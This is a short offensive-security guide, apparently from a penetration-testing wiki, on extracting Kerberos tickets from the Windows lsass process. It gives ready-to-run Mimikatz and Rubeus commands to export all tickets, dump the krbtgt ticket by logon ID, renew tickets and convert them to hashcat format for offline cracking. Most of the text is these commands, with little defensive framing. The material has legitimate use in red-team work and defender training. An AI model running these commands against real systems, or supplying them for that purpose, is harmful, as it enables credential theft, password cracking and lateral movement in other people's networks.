Harvesting tickets from Windows

Tickets in Windows are managed and stored by the lsass (Local Security Authority Subsystem Service) process, responsible for handling security policies. To extract these tickets, it's necessary to interface with the lsass process. A non-administrative user can only access their own tickets, while an administrator has the privilege to extract all tickets on the system. For such operations, the tools Mimikatz and Rubeus are widely employed, each offering different commands and functionalities.

Mimikatz

Mimikatz is a versatile tool that can interact with Windows security. It's used not only for extracting tickets but also for various other security-related operations.

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Rubeus is a tool specifically tailored for Kerberos interaction and manipulation. It's used for ticket extraction and handling, as well as other Kerberos-related activities.

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

When using these commands, ensure to replace placeholders like <BASE64_TICKET> and <luid> with the actual Base64 encoded ticket and Logon ID respectively. These tools provide extensive functionality for managing tickets and interacting with the security mechanisms of Windows.

References

• https://www.tarlogic.com/en/blog/how-to-attack-kerberos/